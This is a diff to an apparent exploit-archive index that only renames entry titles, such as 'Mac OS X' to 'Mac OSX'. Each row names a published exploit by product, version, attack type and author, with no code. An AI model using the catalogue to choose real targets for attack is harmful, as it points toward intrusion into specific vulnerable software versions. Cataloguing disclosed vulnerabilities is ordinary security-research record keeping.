+26446,7 @@ id,file,description,date,author,platform,type,port 29437,platforms/php/webapps/29437.txt,"Easy Banner Pro 2.8 - info.php Remote File Inclusion",2007-01-07,rUnViRuS,php,webapps,0 29438,platforms/php/webapps/29438.txt,"Edit-X - Edit_Address.php Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29439,platforms/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,multiple,remote,0 -29441,platforms/osx/dos/29441.txt,"Apple Mac OS X 10.4.8 - DMG UFS FFS_MountFS Integer Overflow",2007-01-10,LMH,osx,dos,0 +29441,platforms/osx/dos/29441.txt,"Apple Mac OSX 10.4.8 - DMG UFS FFS_MountFS Integer Overflow",2007-01-10,LMH,osx,dos,0 29442,platforms/php/webapps/29442.html,"phpBB 2.0.21 - privmsg.php HTML Injection",2007-01-11,Demential,php,webapps,0 29443,platforms/windows/dos/29443.py,"VideoLAN VLC Media Player 0.8.6a - Unspecified Denial of Service",2007-01-11,shinnai,windows,dos,0 29444,platforms/windows/dos/29444.pl,"CA BrightStor ARCserve Backup - Message Engine/Tape Engine Remote Buffer Overflow",2007-01-11,"Tenable NS",windows,dos,0 @@ -26453,13 +26454,13 @@ id,file,description,date,author,platform,type,port 36794,platforms/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,multiple,webapps,0 29446,platforms/linux/local/29446.c,"Grsecurity Kernel PaX - Privilege Escalation",2006-12-18,anonymous,linux,local,0 29447,platforms/windows/dos/29447.txt,"WinZip 9.0 - Command Line Remote Buffer Overflow",2007-01-12,"Umesh Wanve",windows,dos,0 -29448,platforms/osx/remote/29448.txt,"Apple Mac OS X 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow",2007-01-12,LMH,osx,remote,0 +29448,platforms/osx/remote/29448.txt,"Apple Mac OSX 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow",2007-01-12,LMH,osx,remote,0 29449,platforms/multiple/remote/29449.html,"Oracle ORADC - ActiveX Control Remote Code Execution",2007-01-12,"Umesh Wanve",multiple,remote,0 29450,platforms/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta - Multiple Input Validation Vulnerabilities",2007-01-12,"Doron P",php,webapps,0 29451,platforms/php/webapps/29451.txt,"All In One Control Panel 1.3.x - cp_downloads.php did Parameter SQL Injection",2007-01-12,Coloss,php,webapps,0 -29452,platforms/osx/dos/29452.txt,"Apple Mac OS X 10.4.8 - DMG UFS UFS_LookUp Denial of Service",2007-01-13,LMH,osx,dos,0 +29452,platforms/osx/dos/29452.txt,"Apple Mac OSX 10.4.8 - DMG UFS UFS_LookUp Denial of Service",2007-01-13,LMH,osx,dos,0 29453,platforms/php/webapps/29453.php,"PHP-Nuke 7.x - Block-Old_Articles.php SQL Injection",2007-01-13,Paisterist,php,webapps,0 -29454,platforms/osx/dos/29454.txt,"Apple Mac OS X 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service",2007-01-13,LMH,osx,dos,0 +29454,platforms/osx/dos/29454.txt,"Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service",2007-01-13,LMH,osx,dos,0 29455,platforms/windows/dos/29455.py,"RealNetwork RealPlayer 10.5 - '.MID' File Handling Remote Denial of Service",2007-01-15,shinnai,windows,dos,0 29456,platforms/asp/webapps/29456.txt,"InstantASP 4.1 - Logon.aspx sessionid Parameter Cross-Site Scripting",2007-01-15,Doz,asp,webapps,0 29457,platforms/asp/webapps/29457.txt,"InstantASP 4.1 - Members1.aspx Multiple Parameter Cross-Site Scripting",2007-01-15,Doz,asp,webapps,0 @@ -26481,7 +26482,7 @@ id,file,description,date,author,platform,type,port 29470,platforms/linux/dos/29470.txt,"Oftpd 0.3.7 - Unsupported Address Family Remote Denial of Service",2007-01-15,anonymous,linux,dos,0 29471,platforms/linux/remote/29471.txt,"BlueZ 1.x/2.x - HIDD Bluetooh HID Command Injection",2007-11-16,"Collin Mulliner",linux,remote,0 29472,platforms/php/webapps/29472.txt,"DT_Guestbook 1.0 - 'index.php' Cross-Site Scripting",2007-01-16,"Jesper Jurcenoks",php,webapps,0 -29482,platforms/php/webapps/29482.php,"WordPress Theme Kernel - Remote File Upload",2013-11-07,link_satisi,php,webapps,0 +29482,platforms/php/webapps/29482.php,"WordPress Theme Kernel - Arbitrary File Upload",2013-11-07,link_satisi,php,webapps,0 29483,platforms/php/webapps/29483.txt,"Indexu 5.0/5.3 - send_pwd.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29484,platforms/php/webapps/29484.txt,"Indexu 5.0/5.3 - search.php keyword Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29485,platforms/php/webapps/29485.txt,"Indexu 5.0/5.3 - register.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 @@ -26497,7 +26498,7 @@ id,file,description,date,author,platform,type,port 29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0 29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0 29499,platforms/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",php,webapps,0 -29500,platforms/asp/webapps/29500.txt,"RASPcalendar 1.01 - [ASP] Admin Login Vlunerabilities",2013-11-08,"Hackeri-AL UAH-Crew",asp,webapps,0 +29500,platforms/asp/webapps/29500.txt,"RASPcalendar 1.01 - [ASP] Admin Login",2013-11-08,"Hackeri-AL UAH-Crew",asp,webapps,0 29502,platforms/multiple/dos/29502.html,"Transmit 3.5.5 - Remote Heap Overflow",2007-01-20,LMH,multiple,dos,0 29503,platforms/windows/dos/29503.py,"KarjaSoft Sami HTTP Server 1.0.4/1.0.5/2.0.1 - Request Remote Denial of Service",2007-01-22,shinnai,windows,dos,0 29504,platforms/php/webapps/29504.txt,"Unique Ads - Banner.php SQL Injection",2007-01-22,Linux_Drox,php,webapps,0 @@ -26505,7 +26506,7 @@ id,file,description,date,author,platform,type,port 29506,platforms/php/webapps/29506.txt,"Bitweaver 1.3.1 Articles and Blogs - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,CorryL,php,webapps,0 29507,platforms/php/webapps/29507.txt,"212Cafe Guestbook 4.00 - show.php Cross-Site Scripting",2007-01-22,Linux_Drox,php,webapps,0 29508,platforms/php/webapps/29508.sh,"Vote! Pro 4.0 - Multiple PHP Code Execution Vulnerabilities",2007-01-23,r0ut3r,php,webapps,0 -29509,platforms/osx/dos/29509.txt,"Apple Mac OS X 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption",2007-01-23,LMH,osx,dos,0 +29509,platforms/osx/dos/29509.txt,"Apple Mac OSX 10.4.8 - QuickDraw GetSrcBits32ARGB Remote Memory Corruption",2007-01-23,LMH,osx,dos,0 30029,platforms/php/webapps/30029.txt,"SonicBB 1.0 - search.php Cross-Site Scripting",2007-05-14,"Jesper Jurcenoks",php,webapps,0 30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0 30032,platforms/windows/local/30032.rb,"Steinberg MyMp3PRO 5.0 - Buffer Overflow SEH Exploit (DEP Bypass with ROP)",2013-12-04,metacom,windows,local,0 @@ -26558,10 +26559,10 @@ id,file,description,date,author,platform,type,port 29520,platforms/linux/dos/29520.txt,"GTK2 GDKPixBufLoader - Remote Denial of Service",2007-01-24,"Lubomir Kundrak",linux,dos,0 29521,platforms/php/webapps/29521.txt,"Virtual Host Administrator 0.1 - Modules_Dir Remote File Inclusion",2007-01-24,"Dr Max Virus",php,webapps,0 29522,platforms/php/webapps/29522.py,"WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure",2007-01-24,"Blake Matheny",php,webapps,0 -29523,platforms/osx/dos/29523.txt,"Apple Mac OS X 10.4.x - Software Update Format String",2007-01-25,kf,osx,dos,0 +29523,platforms/osx/dos/29523.txt,"Apple Mac OSX 10.4.x - Software Update Format String",2007-01-25,kf,osx,dos,0 29524,platforms/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution",2007-01-25,Symantec,windows,remote,0 -29525,platforms/php/webapps/29525.txt,"WordPress Highlight Premium Theme - Cross-Site Request Forgery File Upload",2013-11-10,DevilScreaM,php,webapps,0 -29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 +29525,platforms/php/webapps/29525.txt,"WordPress Highlight Premium Theme - Cross-Site Request Forgery / File Upload",2013-11-10,DevilScreaM,php,webapps,0 +29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0 29527,platforms/linux/remote/29527.pl,"Xine 0.99.4 - '.m3u' Remote Format String",2007-01-03,"Kevin Finisterre",linux,remote,0 29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen Safe_mode Restriction-Bypass",2007-01-26,"Maksymilian Arciemowicz",php,local,0 29529,platforms/php/webapps/29529.txt,"PHP Membership Manager 1.5 - admin.php Cross-Site Scripting",2007-01-26,Doz,php,webapps,0 @@ -26592,15 +26593,15 @@ id,file,description,date,author,platform,type,port 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (Denial of Service)",2013-11-12,"Necmettin COSKUN",windows,dos,0 36816,platforms/php/webapps/36816.php,"Open-Letters - Remote PHP Code Injection",2015-04-22,"TUNISIAN CYBER",php,webapps,80 29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0 -29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 +29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0 29811,platforms/jsp/webapps/29811.txt,"Atlassian JIRA 3.4.2 - IssueNavigator.JSPA Cross-Site Scripting",2007-04-02,syniack,jsp,webapps,0 29812,platforms/windows/remote/29812.rb,"DesktopCentral AgentLogUpload - Arbitrary File Upload",2013-11-25,Metasploit,windows,remote,8020 -29551,platforms/osx/dos/29551.txt,"Apple Mac OS X 10.4.x - iMovie HD .imovieproj Filename Format String",2007-01-30,LMH,osx,dos,0 +29551,platforms/osx/dos/29551.txt,"Apple Mac OSX 10.4.x - iMovie HD .imovieproj Filename Format String",2007-01-30,LMH,osx,dos,0 29552,platforms/windows/remote/29552.rb,"Symantec Altiris DS - SQL Injection",2013-11-13,Metasploit,windows,remote,402 -29553,platforms/osx/dos/29553.txt,"Apple Mac OS X 10.4.x - Help Viewer .help Filename Format String",2007-01-30,LMH,osx,dos,0 -29554,platforms/osx/dos/29554.txt,"Apple Mac OS X 10.4.x - iPhoto photo:// URL Handling Format String",2007-01-30,LMH,osx,dos,0 -29555,platforms/osx/dos/29555.txt,"Apple Mac OS X 10.4.x - Safari window.console.log Format String",2007-01-30,LMH,osx,dos,0 +29553,platforms/osx/dos/29553.txt,"Apple Mac OSX 10.4.x - Help Viewer .help Filename Format String",2007-01-30,LMH,osx,dos,0 +29554,platforms/osx/dos/29554.txt,"Apple Mac OSX 10.4.x - iPhoto photo:// URL Handling Format String",2007-01-30,LMH,osx,dos,0 +29555,platforms/osx/dos/29555.txt,"Apple Mac OSX 10.4.x - Safari window.console.log Format String",2007-01-30,LMH,osx,dos,0 29556,platforms/php/webapps/29556.txt,"OpenEMR 2.8.2 - Import_XML.php Remote File Inclusion",2007-01-31,trzindan,php,webapps,0 29557,platforms/php/webapps/29557.txt,"OpenEMR 2.8.2 - Login_Frame.php Cross-Site Scripting",2007-01-31,"Michael Melewski",php,webapps,0 29558,platforms/windows/dos/29558.c,"Comodo Firewall 2.3.6 - CMDMon.SYS Multiple Denial of Service Vulnerabilities",2007-02-01,"Matousec Transparent security",windows,dos,0 @@ -26615,11 +26616,11 @@ id,file,description,date,author,platform,type,port 29567,platforms/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting",2007-02-05,digi7al64,cfm,webapps,0 29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Remote File Inclusion / Local File Inclusion",2007-02-05,anonymous,php,webapps,0 29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine - Affichearticles.php3 Remote File Inclusion",2007-02-06,Blaster,php,webapps,0 -29570,platforms/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Change Admin Password Cross-Site Request Forgery",2013-11-13,"Hubert Gradek",hardware,webapps,0 +29570,platforms/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - (Change Admin Password) Cross-Site Request Forgery",2013-11-13,"Hubert Gradek",hardware,webapps,0 29571,platforms/php/webapps/29571.txt,"SYSCP 1.2.15 - System Control Panel CronJob Arbitrary Code Execution",2007-02-07,"Daniel Schulte",php,webapps,0 29572,platforms/php/webapps/29572.txt,"CPanel 11 - PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,php,webapps,0 29573,platforms/multiple/remote/29573.xml,"Sage 1.3.6 - Extension Feed HTML Injection",2007-02-09,Fukumori,multiple,remote,0 -29574,platforms/php/webapps/29574.php,"eXtreme File Hosting - Arbitrary RAR File Upload",2007-02-09,"hamed bazargani",php,webapps,0 +29574,platforms/php/webapps/29574.php,"eXtreme File Hosting - Arbitrary .RAR File Upload",2007-02-09,"hamed bazargani",php,webapps,0 29575,platforms/windows/remote/29575.txt,"Plain Old WebServer 0.0.7/0.0.8 Firefox Extension - Directory Traversal",2006-09-25,"Stefano Di Paola",windows,remote,0 29576,platforms/jsp/webapps/29576.txt,"Atlassian JIRA 3.7.3 - BrowseProject.JSPA Cross-Site Scripting",2007-02-09,BL4CK,jsp,webapps,0 29577,platforms/php/dos/29577.php,"PHP 5.2.1 - STR_IReplace Remote Denial of Service",2007-02-09,"Thomas Hruska",php,dos,0 @@ -26666,7 +26667,7 @@ id,file,description,date,author,platform,type,port 29617,platforms/windows/dos/29617.pl,"News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (1)",2007-02-19,"Parveen Vashishtha",windows,dos,0 29618,platforms/windows/dos/29618.c,"News File Grabber 4.1.0.1 - Subject Line Stack Buffer Overflow (2)",2007-02-19,Marsu,windows,dos,0 29619,platforms/windows/remote/29619.html,"Microsoft Internet Explorer 6 - Local File Access",2007-02-20,"Rajesh Sethumadhavan",windows,remote,0 -29620,platforms/osx/dos/29620.txt,"Apple Mac OS X 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",osx,dos,0 +29620,platforms/osx/dos/29620.txt,"Apple Mac OSX 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",osx,dos,0 29621,platforms/php/webapps/29621.txt,"AbleDesign MyCalendar 2.20.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-02-20,sn0oPy,php,webapps,0 29622,platforms/asp/webapps/29622.txt,"Design4Online - Userpages2 Page.asp SQL Injection",2007-02-20,xoron,asp,webapps,0 29623,platforms/cgi/webapps/29623.txt,"Google Desktop - Cross-Site Scripting",2007-02-21,"Yair Amit",cgi,webapps,0 @@ -26705,11 +26706,11 @@ id,file,description,date,author,platform,type,port 29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash PoC",2013-11-23,"Akin Tosunlar",windows,dos,0 29658,platforms/php/webapps/29658.txt,"PhotoStand 1.2 - 'index.php' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps,0 29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 - Explorer .WMF File Handling Denial of Service",2007-02-25,sehato,windows,dos,0 -29660,platforms/windows/dos/29660.txt,"Microsoft Office 2003 - Denial of Service (Denial of Service)",2007-02-25,sehato,windows,dos,0 +29660,platforms/windows/dos/29660.txt,"Microsoft Office 2003 - Denial of Service",2007-02-25,sehato,windows,dos,0 29661,platforms/php/webapps/29661.txt,"Docebo CMS 3.0.x - 'index.php' searchkey Parameter Cross-Site Scripting",2007-02-24,r00t,php,webapps,0 29662,platforms/php/webapps/29662.txt,"Docebo CMS 3.0.x - modules/htmlframechat/index.php Multiple Parameter Cross-Site Scripting",2007-02-24,r00t,php,webapps,0 29663,platforms/php/webapps/29663.txt,"SolarPay - 'index.php' Local File Inclusion",2007-02-26,"Hasadya Raed",php,webapps,0 -29664,platforms/windows/dos/29664.txt,"Microsoft Publisher 2007 - Remote Denial of Service (Denial of Service)",2007-02-26,"Tom Ferris",windows,dos,0 +29664,platforms/windows/dos/29664.txt,"Microsoft Publisher 2007 - Remote Denial of Service",2007-02-26,"Tom Ferris",windows,dos,0 29665,platforms/php/webapps/29665.txt,"SQLiteManager 1.2 - Local File Inclusion",2007-02-26,"Simon Bonnard",php,webapps,0 29666,platforms/hardware/remote/29666.rb,"Supermicro Onboard IPMI - close_window.cgi Buffer Overflow",2013-11-18,Metasploit,hardware,remote,80 29667,platforms/php/webapps/29667.txt,"WordPress Euclid Theme 1.x.x - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 @@ -26759,7 +26760,7 @@ id,file,description,date,author,platform,type,port 29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0 29716,platforms/linux/dos/29716.txt,"Silc Server 1.0.2 - New Channel Remote Denial of Service",2007-03-06,"Frank Benkstein",linux,dos,0 29717,platforms/linux/dos/29717.txt,"radscan conquest 8.2 - Multiple Vulnerabilities",2007-03-07,"Luigi Auriemma",linux,dos,0 -29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - '.m3u' SEH Buffer Overflow 'UNICODE'",2013-11-24,"Mike Czumak",windows,local,0 +29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - '.m3u' Buffer Overflow (SEH) 'UNICODE'",2013-11-24,"Mike Czumak",windows,local,0 29720,platforms/linux/dos/29720.txt,"Mozilla Firefox 2.0.0.2 - Document.Cookie Path Argument Denial of Service",2007-03-08,"Nicolas DEROUET",linux,dos,0 29721,platforms/windows/dos/29721.pl,"Fish - Multiple Remote Buffer Overflow Vulnerabilities",2007-03-08,"ilja van sprundel",windows,dos,0 29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0 @@ -26778,12 +26779,12 @@ id,file,description,date,author,platform,type,port 29735,platforms/hardware/remote/29735.rb,"D-Link TFTP 1.0 - Transporting Mode Remote Buffer Overflow",2007-03-12,LSO,hardware,remote,0 29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 - ADODB-Connection.Inc.php Remote File Inclusion",2007-03-12,"RaeD Hasadya",php,webapps,0 29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - Check_Vote.php Local File Inclusion",2007-03-13,"BorN To K!LL",php,webapps,0 -29738,platforms/windows/dos/29738.txt,"Microsoft Windows XP/2000 - WinMM.dll .WAV Files Remote Denial of Service (Denial of Service)",2007-03-13,"Michal Majchrowicz",windows,dos,0 +29738,platforms/windows/dos/29738.txt,"Microsoft Windows XP/2000 - WinMM.dll .WAV Files Remote Denial of Service",2007-03-13,"Michal Majchrowicz",windows,dos,0 29739,platforms/linux/remote/29739.txt,"Apache HTTP Server Tomcat 5.x/6.0.x - Directory Traversal",2007-03-14,"D. Matscheko",linux,remote,0 29740,platforms/windows/dos/29740.txt,"MiniGZip - Controls File_Compress Buffer Overflow",2007-03-14,starcadi,windows,dos,0 29741,platforms/windows/remote/29741.txt,"Microsoft Internet Explorer 7 - NavCancel.HTM Cross-Site Scripting",2007-03-14,"Aviv Raff",windows,remote,0 29742,platforms/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client - Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps,0 -29743,platforms/windows/dos/29743.txt,"Symantec SYMTDI.SYS Device Driver - Local Denial of Service (Denial of Service)",2007-03-15,"David Matousek",windows,dos,0 +29743,platforms/windows/dos/29743.txt,"Symantec SYMTDI.SYS Device Driver - Local Denial of Service",2007-03-15,"David Matousek",windows,dos,0 29744,platforms/php/webapps/29744.txt,"Viper Web Portal 0.1 - 'index.php' Remote File Inclusion",2007-03-15,"Abdus Samad",php,webapps,0 29745,platforms/php/webapps/29745.txt,"Horde Framework 3.1.3 - 'login.php' Cross-Site Scripting",2007-03-15,"Moritz Naumann",php,webapps,0 29746,platforms/linux/local/29746.txt,"Horde Framework and IMP 2.x/3.x - Cleanup Cron Script Arbitrary File Deletion",2007-03-15,anonymous,linux,local,0 @@ -26817,9 +26818,9 @@ id,file,description,date,author,platform,type,port 29774,platforms/php/webapps/29774.txt,"Free File Hosting System 1.1 - register.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 29775,platforms/php/webapps/29775.txt,"Image_Upload Script 2.0 - Multiple Remote File Inclusion",2007-03-26,Crackers_Child,php,webapps,0 29776,platforms/php/webapps/29776.txt,"CcCounter 2.0 - 'index.php' Cross-Site Scripting",2007-03-26,Crackers_Child,php,webapps,0 -29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 - '.m3u' SEH Buffer Overflow 'UNICODE'",2013-11-22,"Mike Czumak",windows,local,0 +29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 - '.m3u' Buffer Overflow (SEH) 'UNICODE'",2013-11-22,"Mike Czumak",windows,local,0 29780,platforms/php/webapps/29780.txt,"Mephisto Blog 0.7.3 - Search Function Cross-Site Scripting",2007-03-26,The[Boss],php,webapps,0 -29781,platforms/linux/dos/29781.c,"Linux Kernel 2.6.x - IPv6_SockGlue.c NULL Pointer Dereference Denial of Service",2007-03-26,"Joey Mengele",linux,dos,0 +29781,platforms/linux/dos/29781.c,"Linux Kernel 2.6.x - IPv6_SockGlue.c Null Pointer Dereference Denial of Service",2007-03-26,"Joey Mengele",linux,dos,0 29782,platforms/php/webapps/29782.txt,"Satel Lite - Satellite.php Local File Inclusion",2007-11-26,rUnViRuS,php,webapps,0 29783,platforms/php/webapps/29783.txt,"Fizzle 0.5 - RSS Feed HTML Injection",2007-03-26,"CrYpTiC MauleR",php,webapps,0 29784,platforms/php/remote/29784.php,"PHP 5.2.1 - Folded Mail Headers Email Header Injection",2007-11-26,"Stefan Esser",php,remote,0 @@ -26872,7 +26873,7 @@ id,file,description,date,author,platform,type,port 30146,platforms/ios/webapps/30146.txt,"Print n Share 5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,ios,webapps,0 30152,platforms/php/webapps/30152.txt,"My Databook - diary.php delete Parameter SQL Injection",2007-06-04,Serapis.net,php,webapps,0 30153,platforms/php/webapps/30153.txt,"My Databook - diary.php year Parameter Cross-Site Scripting",2007-06-04,Serapis.net,php,webapps,0 -30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - SEH Buffer Overflow (.reg)",2013-12-09,"Mike Czumak",windows,local,0 +30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - Buffer Overflow (SEH) (.reg)",2013-12-09,"Mike Czumak",windows,local,0 30159,platforms/asp/webapps/30159.txt,"ASP Folder Gallery - Download_Script.asp Arbitrary File Download",2007-06-06,freeprotect.net,asp,webapps,0 30160,platforms/windows/dos/30160.txt,"Microsoft Windows XP - GDI+ ICO File Remote Denial of Service",2007-06-06,"Dennis Rand",windows,dos,0 30161,platforms/php/webapps/30161.txt,"Atom Photoblog 1.0.1/1.0.9 - AtomPhotoblog.php Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps,0 @@ -26900,11 +26901,11 @@ id,file,description,date,author,platform,type,port 29795,platforms/hardware/webapps/29795.pl,"Pirelli Discus DRG A125g - Local Password Disclosure",2013-11-24,"Sebastián Magof",hardware,webapps,0 29796,platforms/hardware/webapps/29796.pl,"Pirelli Discus DRG A125g - Remote Change WiFi Password",2013-11-24,"Sebastián Magof",hardware,webapps,0 29797,platforms/php/webapps/29797.txt,"MyBB Ajaxfs 2 Plugin - SQL Injection",2013-11-24,"IeDb ir",php,webapps,0 -29799,platforms/windows/local/29799.pl,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2013-11-24,"Mike Czumak",windows,local,0 +29799,platforms/windows/local/29799.pl,"Total Video Player 1.3.1 (Settings.ini) - Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0 29800,platforms/windows/dos/29800.py,"Microsoft Internet Explorer 7 - HTML Denial of Service",2007-03-28,shinnai,windows,dos,0 29801,platforms/php/local/29801.php,"PHP 5.2.1 - Session.Save_Path() TMPDIR open_basedir Restriction Bypass",2007-03-28,"Stefan Esser",php,local,0 29802,platforms/hardware/webapps/29802.txt,"TPLINK WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0 -29803,platforms/windows/dos/29803.pl,"Static Http Server 1.0 - Denial of Service (Denial of Service) Exploit",2013-11-25,GalaxyAndroid,windows,dos,0 +29803,platforms/windows/dos/29803.pl,"Static Http Server 1.0 - Denial of Service",2013-11-25,GalaxyAndroid,windows,dos,0 29804,platforms/php/local/29804.php,"PHP 5.2.1 - Multiple functions Reference Parameter Information Disclosure",2007-03-29,"Stefan Esser",php,local,0 29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 - 404.php Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps,0 29806,platforms/php/webapps/29806.pl,"PHP-Fusion 6.1.5 - Calendar_Panel Module Show_Event.php SQL Injection",2007-03-31,UNIQUE-KEY,php,webapps,0 @@ -26933,7 +26934,7 @@ id,file,description,date,author,platform,type,port 29831,platforms/php/webapps/29831.txt,"DropAFew 0.2 - newaccount2.php Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps,0 29832,platforms/php/webapps/29832.txt,"DropAFew 0.2 - search.php delete Action id Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 29833,platforms/php/webapps/29833.txt,"DropAFew 0.2 - editlogcal.php save Action calories Parameter SQL Injection",2007-04-10,"Alexander Klink",php,webapps,0 -29834,platforms/php/webapps/29834.txt,"WordPress dzs-videogallery Plugins - Remote File Upload",2013-11-26,link_satisi,php,webapps,0 +29834,platforms/php/webapps/29834.txt,"WordPress dzs-videogallery Plugins - Arbitrary File Upload",2013-11-26,link_satisi,php,webapps,0 29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor - DSKernel2.dll ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,windows,remote,0 29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 - Hostname Remote Buffer Overflow",2007-04-30,"Thomas Pollet",windows,dos,0 29838,platforms/php/webapps/29838.txt,"DotClear 1.2.x - /ecrire/trackback.php post_id Parameter Cross-Site Scripting",2007-04-11,nassim,php,webapps,0 @@ -26978,7 +26979,7 @@ id,file,description,date,author,platform,type,port 29878,platforms/php/webapps/29878.txt,"Allfaclassifieds 6.04 - Level2.php Remote File Inclusion",2007-04-23,Dr.RoVeR,php,webapps,0 29879,platforms/php/webapps/29879.txt,"PHPMyBibli 1.32 - Init.Inc.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29880,platforms/php/webapps/29880.txt,"File117 - Multiple Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 -29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass Exploit with SANDBOX Bypass",2013-11-28,"w3bd3vil and abh1sek",windows,local,0 +29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass with SANDBOX Bypass",2013-11-28,"w3bd3vil and abh1sek",windows,local,0 29882,platforms/php/webapps/29882.html,"PHPMySpace Gold 8.10 - article.php SQL Injection",2007-04-23,"John Martinelli",php,webapps,0 29883,platforms/php/webapps/29883.txt,"ACVSWS - Transport.php Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps,0 29884,platforms/multiple/remote/29884.txt,"Apple QuickTime 7.1.5 - QTJava toQTPointer() Java Handling Arbitrary Code Execution",2007-04-23,"Shane Macaulay",multiple,remote,0 @@ -27038,7 +27039,7 @@ id,file,description,date,author,platform,type,port 29943,platforms/windows/dos/29943.c,"Progress WebSpeed 3.0/3.1 - Denial of Service",2007-05-02,"Eelko Neven",windows,dos,0 29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion",2007-05-03,"ilker Kandemir",php,webapps,0 29945,platforms/hardware/remote/29945.txt,"D-Link DSL-G624T - Var:RelaodHref Cross-Site Scripting",2007-05-03,"Tim Brown",hardware,remote,0 -29946,platforms/php/webapps/29946.txt,"WordPress Orange Themes - Cross-Site Request Forgery (File Upload)",2013-12-01,"Jje Incovers",php,webapps,0 +29946,platforms/php/webapps/29946.txt,"WordPress Orange Themes - Cross-Site Request Forgery (Arbitrary File Upload)",2013-12-01,"Jje Incovers",php,webapps,0 